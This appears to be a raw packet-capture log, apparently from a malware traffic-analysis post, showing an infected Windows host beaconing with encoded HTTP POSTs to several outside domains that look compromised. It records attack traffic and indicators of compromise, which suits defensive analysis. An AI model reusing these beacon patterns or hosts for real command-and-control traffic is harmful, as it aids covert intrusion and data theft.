2019-07-29 13:00:59.135089 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [P.], seq 1:771, ack 1, win 64240, length 770: HTTP: POST / HTTP/1.1
E..*.?@…].
..eh..V.b.P…&D;”.P…….POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.spanesi.com
Cache-Control: no-cache

Ax7m7VKupQADayozBXlPTlW3Rb+iyGxupqnfz1KXuEtJqsumvHWGTXgJ3la7IYWyy0wrfcd5tq0Nv67QGRfa37je7asRoaeUZBk3+iNqzlDQfA5IlmanUWhBkpt6ZvKUdmZZ09qLi6STnTf1e8iYiZFDHV044pCuy5LeLxK83OAITgApwVagHdhrfPJ0aVaMwjbgjaLz/50Y1fI2IXTVCi3T1cJt3/qeUYHullfNxq/RhDqhf0+7FujpJC/mzBY9wTmslIDYVlPBBkxidBjvOXZbqxwXVr+tpsacYBRwCAUzqodwinxWAE+dL0w39CJzQkeDpIsP7Ie+uXE82zpN4CVrDcdENT1FKfEoSEgyIhif8lf4AEWirBJ8H7KfdQFT+rWN11eEqNzZcI0neS/w6AhPyUsXP8M7DI2Zhm3/1gkVs6MteuCbYZ6nXSHMa1T1txVasJ8QIuIXOBeHEj+6bmVcFiZbiFuVztE6eZJsE6lehw52lhdoJ5y+6s0lkNiWzYvmi/zEedIjhAJc02zaoQ==
2019-07-29 13:00:59.135140 IP 104.26.2.86.80 > 10.7.29.101.49250: Flags [.], ack 771, win 64240, length 0
E..(.y…..zh..V
..e.P.bD;”….(P…v~..
2019-07-29 13:00:59.153346 IP 172.16.5.2.53 > 10.7.29.101.65154: 28480 2/2/4 CNAME 2print.com., A 184.168.221.53 (202)
E….z……….
..e.5….~.o@………..www.2print.com…………………………….5………….ns27.domaincontrol……………ns28.O.J……….aJg..J……….&…!q………..k…………G..k……….&…”q……….
2019-07-29 13:00:59.153873 IP 10.7.29.101.49254 > 184.168.221.53.80: Flags [S], seq 1193526277, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.@@…5:
..e…5.f.PG#…….. ……………..
2019-07-29 13:00:59.155302 IP 104.31.73.201.80 > 10.7.29.101.49251: Flags [S.], seq 355223488, ack 4209286922, win 64240, options [mss 1460], length 0
E..,.{……h.I.
..e.P.c.,G….
`….B……
2019-07-29 13:00:59.155392 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [.], ack 1, win 64240, length 0
E..(.A@….;
..eh.I..c.P…
.,G.P…#…
2019-07-29 13:00:59.155532 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [P.], seq 1:773, ack 1, win 64240, length 772: HTTP: POST / HTTP/1.1
E..,.B@….6
..eh.I..c.P…
.,G.P…Nn..POST / HTTP/1.1
Accept: /
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 540
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.rs-ag.com
Cache-Control: no-cache

XXTc5yB8pQDhZhbvcwBrU1OYKjSIHRfuVCXVJsqxREL8MU9UVfvk6NEGuk8mLn6d9of2goBzO4ncAiRL0nhgYuUZIkCk/czwzlMog/4/3ohpHmcPJ7e2pFZfvWGSSgdnBNt/1Wk2SJ2JiG4yx4XMfJ9wvPi9Ka8XgZYU43vQIqgC+k8tEmMcmqYPXVOe7LApGAcTprzV80reoZUgsQcC7XVKzYwYBqiyFZdClmwgpge3ALD2XNTtaHw75PuO1i2pgc3zcV0WOt0ulFzN6IexXdr62goFpRuT2aQdjNI9ZUYpWxLs0uWgjFhM1Os7djM7Pjtn0rX2jKQHFnr9i3565oL0jsqhNqphYFWeMsY+VwYxJJBe08X0CnEPO6N5x3eyqTzKSWDM7+un3diIY20b7H6iBnMRF5xV9YZBtLNHP5p+03UFutC3RqBlQVwuvdphGuymo8uHmHdhvwOYyR2sU1AABoZHo66XaXj8JflxcbSWTmzbuOS+ZySWEEei2bAPsaUlWRndr9aVx35jZOsH8psKMw==
2019-07-29 13:00:59.155592 IP 104.31.73.201.80 > 10.7.29.101.49251: Flags [.], ack 773, win 64240, length 0
E..(.|……h.I.
..e.P.c.,G…..P… …
2019-07-29 13:00:59.171901 IP 104.25.152.27.80 > 10.7.29.101.49252: Flags [S.], seq 924723558, ack 2628897603, win 64240, options [mss 1460], length 0
E..,.}….b.h…
..e.P.d7.)f…C`….V……
2019-07-29 13:00:59.172132 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [.], ack 1, win 64240, length 0
E..(.C@…..
..eh….d.P…C7.)gP…….
2019-07-29 13:00:59.172470 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [P.], seq 1:768, ack 1, win 64240, length 767: HTTP: POST / HTTP/1.1
E..’.D@…..
..eh….d.P…C7.)gP….u..POST / HTTP/1.1
Accept: /
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.c9dd.com
Cache-Control: no-cache

biRN0zTRpADIHVQlj0s8Xof2rF4sqrrVqBmtdiNN5r1aTGBCayDDw/GsDOn3drrVedvEeN/rz1NDDypzGUjdXX87PABis7mAdVShJmNAFzWiqtIbOTiF0mAlofT86Dj3ZA+lPMiQGBMzW1P6aRP5qR+btt2+T8j0dqUdUb+aJnjlneEERgnq595Ot8a/17XcGtdlcA+Yz2MbGK4RzYaWtdZGvTfM9zEkCRIiSCYvyVlYyV2Jqd7ehNDm0f9iIynTF3vZ9d1JTCLd9EuORzj4s5RjPWn7We1XfGVlafFt7upU1qtbVkc7OyEMavyhra8fa0PPevqlrT1x/tcYPbFEuJ5a6cLsjN7WH+3EGMRCW9xThRDB1XsDYmuC7WFYZtbUthL/S7Em+rhFbBkXxXToRhyhzCDz9WVI2qroJGIBkbCAsY44QfNUH5j0VoXufYlUSjL5A37rGZtJtJ87e3Wlr/2GEd5mGUv9P5+lEnbE9ZJEE/+SpZPFMgjqo2+y6LZQnyPwwLkG17ZxSd7ZYqcrUNg/

2019-07-29 13:00:59.687314 IP 10.7.29.101.52012 > 172.16.5.2.53: 33479+ A? www.vazir.se. (30)
E..:.o….Y.
..e…..,.5.&%3………….www.vazir.se…..
2019-07-29 13:00:59.699312 IP 58.64.191.148.80 > 10.7.29.101.49259: Flags [S.], seq 687621463, ack 3876635042, win 64240, options [mss 1460], length 0
E..,……h.:@..
..e.P.k(.EW….`….”……
2019-07-29 13:00:59.699454 IP 10.7.29.101.49259 > 58.64.191.148.80: Flags [.], ack 1, win 64240, length 0
E..(.p@…..
..e:@…k.P….(.EXP…….
2019-07-29 13:00:59.699544 IP 10.7.29.101.49259 > 58.64.191.148.80: Flags [P.], seq 1:756, ack 1, win 64240, length 755: HTTP: POST / HTTP/1.1
E….q@….+
..e:@…k.P….(.EXP…….POST / HTTP/1.1
Accept: /
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 520
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.vitaindu.com
Cache-Control: no-cache

8IlD6Hp/pQBUVUU1HQiLqL0qEQfqhORoTjln6RJOQ15jryfneNJiY86EOVLCoqU8bm0OsgXpA0255OV/bAT01clkJeyVjje3bxnPyOvfUsPdp3RPMckUExFs8ujM0HXhFPAwBD3zV8qMRTWUMmJ6279Vl4oR4y8nMYNUzUT6wR28tmL6c8XsaVi4OBQu2Nq/IKf6OeD7IWIFGjE0V7Z38R/syLDaPfmBm0j04GoUIPqmB01zH2k/Br0302lD9sG/tg3odcCXvrktL/YlCBy4NfihYgr8CxaZa4HPM1oVPyusFQHhfw9DDZ/X7aFC+nL8KeKhCK3RtjW4/4McUWA/fw3thufPiTO+fU6adClg6cz69ImGjn9e7M5+A+gcNHnLWNCqkDLoGPRFzTRjKk6Q9hbQQeX/ZidGdK0i+u1ldp2Btm89r0Ct0WSdAigO04vXdHZzaLphNqT/N7liOfi1IT4tX4U+0diO4uC+X699Z6Qf+DftG+NLC4Je+8Wpm+/6+HnqxHQ=
2019-07-29 13:00:59.699603 IP 58.64.191.148.80 > 10.7.29.101.49259: Flags [.], ack 756, win 64240, length 0
E..(……h.:@..
..e.P.k(.EX….P…….
2019-07-29 13:00:59.782318 IP 172.16.5.2.53 > 10.7.29.101.58389: 12756 1/2/2 A 210.140.73.39 (142)
E……………
..e.5….O.1…………www.ex-olive.com……………….I’………….ns01.telewave.ad.jp…………..ns01.epressd.O._…………JR.>………..z.2
2019-07-29 13:00:59.783153 IP 10.7.29.101.49262 > 210.140.73.39.80: Flags [S], seq 3843601751, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.r@….2
..e..I’.n.P…W…… ……………..
2019-07-29 13:00:59.819475 IP 157.7.107.91.80 > 10.7.29.101.49255: Flags [P.], seq 13821:15203, ack 811, win 64240, length 1382: HTTP
E………T…k[
..e.P.g)…..NSP…….2.528c.494-.542.973-1.114 1.5-1.716.449-.544.869-1.111 1.257-1.7l.15-.226c.329-.481.659-.983.988-1.505.329-.522.599-.963.808-1.324l.4-.692c1.607-2.889 2.963-5.91 4.055-9.03 2.459-7.089 3.861-14.502 4.16-22 0-.773.03-1.556.09-2.348 7.811 2.273 17.1 5.433 20.726 8.157 2.257 2 4.155 19.52 5.427 42.428h3.666c-1.332-21.91-3.381-42.477-7.013-45.182-4.658-3.512-16.387-7.25-24.858-9.593l-8.558-4.257c-.674-.339-1.488-.219-2.035.3l-5.791 5.523-4.25 4.034-4.19-4.079-5.731-5.569c-.54-.53-1.355-.662-2.035-.331l-8.784 4.289c-8.47 2.273-20.022 5.87-24.646 9.286-3.685 2.715-5.645 23.414-6.68 45.574h3.652zm57.856-53.069l.628-.783.284-.271 1.18-1.128.254.12 3.906 1.957 2.918 1.5v.135l-4.744 12.04-8.694-5.794-2.32-1.5 6.588-6.276zm-28.013 1.159l2.993-1.5 3.846-1.881.21-.06.09.075 1.407 1.37h.075l.569.557 6.51 6.366-2.245 1.5-8.829 5.779-4.621-12.04-.005-.166zm2.14 15.577c.194.505.606.894 1.12 1.061.514.167 1.076.092 1.529-.203l10.475-6.893 3.292-2.152 3.307 2.243 10.475 6.923c.45.303 1.013.386 1.53.225.518-.161.935-.548 1.134-1.053l1.766-4.515c-.686 4.963-1.905 9.837-3.636 14.539-.932 2.49-2.053 4.905-3.352 7.224l-.389.662-.7 1.174c-.359.572-.718 1.1-1.062 1.61l-.21.3c-.344.5-.7.963-1.047 1.4l-.434.527c-.344.406-.673.8-1.018 1.159-.689.743-1.429 1.436-2.215 2.075h-8.863c-.765-.637-1.485-1.326-2.155-2.062-.359-.391-.7-.8-1.062-1.249l-.374-.452c-.359-.467-.733-.963-1.092-1.505l-.1
2019-07-29 13:00:59.819587 IP 10.7.29.101.49255 > 157.7.107.91.80: Flags [.], ack 15203, win 62858, length 0
E..(.s@…..
..e..k[.g.P..NS)..%P….B..
2019-07-29 13:00:59.820412 IP 157.7.107.91.80 > 10.7.29.101.49255: Flags [P.], seq 15203:16585, ack 811, win 64240, length 1382: HTTP
E………T…k[
..e.P.g)..%..NSP…….5-.226c-.374-.542-.733-1.1-1.107-1.7l-.434-.722c-.209-.346-.418-.707-.629-1.084-1.273-2.322-2.369-4.737-3.277-7.224-1.852-5.166-3.093-10.53-3.7-15.984l2.278 5.902zm49.653 36.333l.1-25.993c.016-.483-.162-.953-.494-1.305-.331-.351-.79-.553-1.272-.561-.239-.011-.478.03-.7.12-.678.284-1.115.951-1.107 1.686v26.053h3.473zm-36.288-26.189c.328 1.337 1.526 2.277 2.903 2.277s2.575-.94 2.903-2.277c.157-.858-.076-1.741-.636-2.409-.558-.666-1.384-1.047-2.253-1.038l.075.015c-.885-.038-1.74.328-2.322.996-.582.668-.829 1.564-.67 2.436zm2.946 6.2v.015c-.968-.014-1.88.452-2.437 1.244-.556.792-.685 1.808-.343 2.714.456 1.128 1.552 1.867 2.769 1.867s2.313-.739 2.769-1.867c.058-.152.103-.308.13:

Leave a Reply